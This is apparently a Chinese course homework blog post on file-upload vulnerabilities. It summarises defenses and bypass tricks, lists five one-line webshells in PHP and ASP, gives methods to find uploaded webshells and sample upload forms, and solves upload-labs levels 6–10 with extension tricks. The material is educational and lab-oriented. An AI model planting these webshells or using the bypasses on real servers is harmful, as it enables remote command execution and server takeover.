第七次作业

目录

一,文件上传防御手段及绕过手段总结

文件上传防御手段

文件上传绕过手段

二,文件上传常用一句话木马

三,课中所讲的三种webshell管理工具的使用方法(演示使用该工具连接webshell及抓取流量包进行分析特征)

Godzilla分析

behinder分析

antsword分析

四,文件上传无回显如何查找webshell地址

五,文件上传表单的无参/有参情况下构造表单 -- 加分项

六,upload-labs靶场通关第6-第10

pass6

pass7

pass8

pass9

pass10


一,文件上传防御手段及绕过手段总结

文件上传防御手段

1.限制文件类型:

只允许上传特定类型的文件(如图片、PDF等),通过 MIME 类型或文件扩展名来验证文件类型。

2.文件内容检测:

对上传文件的内容进行检查,如扫描文件是否包含恶意代码、使用杀毒软件对文件进行扫描。

3.文件大小限制:

设置文件上传的大小限制,防止上传过大的文件,减少DOS攻击的风险。

4.文件存储位置及权限管理:

将上传的文件存储在专门的目录,并设置严格的访问权限,防止直接通过 URL 访问上传的文件。

5.文件名处理:

对上传的文件进行重命名,防止攻击者通过文件名进行路径穿越攻击。

文件上传绕过手段

1.利用文件类型混淆:

上传文件时将恶意代码嵌入到允许的文件类型中,比如在图片文件中嵌入 PHP 代码。

2.双扩展名攻击:

利用双扩展名(如 shell.php.jpg)来绕过扩展名检测,服务器可能会按第一扩展名来判断文件类型,但按第二扩展名来执行。

3.文件名编码绕过:

使用特殊字符、URL 编码、Unicode 编码等方法,绕过服务器的文件名检测机制。

4.压缩文件攻击:

将恶意文件压缩成 .zip 或 .rar 格式上传,服务器解压后可能会执行其中的恶意代码。

5.目录穿越攻击:

在文件路径中使用 ../ 等符号进行路径穿越,上传恶意文件到不受限制的目录。

二,文件上传常用一句话木马

<?php @eval($_POST['attack']) ?>

<?php system($_GET['cmd']);?>

<%eval request ("pass")%>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["pass"],"unsafe");%>

三,课中所讲的三种webshell管理工具的使用方法(演示使用该工具连接webshell及抓取流量包进行分析特征)

Godzilla分析

behinder分析

antsword分析

四,文件上传无回显如何查找webshell地址

1. 检查上传路径:

确认文件上传的路径。通常,上传的文件会被保存在服务器的特定目录中。访问代码,检查文件上传的处理逻辑,找出上传路径。

2. 通过日志文件查找:

检查服务器的访问日志(如 access.log 和 error.log),看是否有异常的访问记录。查找上传文件请求的记录,通常 Webshell 的上传会伴随着特殊请求。

3. 扫描常见目录:

使用扫描工具(如 DirBuster、Gobuster、Wfuzz 等)扫描常见的 Webshell 目录。包括 uploads/, images/, files/ 等。

4. 使用查壳工具:

使用自动化工具,如 D盾、kali linux 自带的扫描工具,来扫描服务器上的可疑文件。可以扫描已知的 Webshell 签名或可疑的文件。

五,文件上传表单的无参/有参情况下构造表单 -- 加分项

1. 无参情况

<form action="/upload" method="post" enctype="multipart/form-data">
    <label for="file">选择文件:</label>
    <input type="file" id="file" name="file">
    <input type="submit" value="上传文件">
</form>

2. 有参情况

<form action="/upload" method="post" enctype="multipart/form-data">
    <label for="username">用户名:</label>
    <input type="text" id="username" name="username">
    
    <label for="description">文件描述:</label>
    <textarea id="description" name="description"></textarea>
    
    <label for="file">选择文件:</label>
    <input type="file" id="file" name="file">
    
    <input type="submit" value="上传文件">
</form>

六,upload-labs靶场通关第6-第10

pass6

后缀改大写

pass7

burpsuite抓包后缀加空格

pass8

burpsuite抓包后缀加.

pass9

burpsuite抓包后缀加::$DATA

发送后删除::$DATA

pass10

burpsuite抓包后缀加. .

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值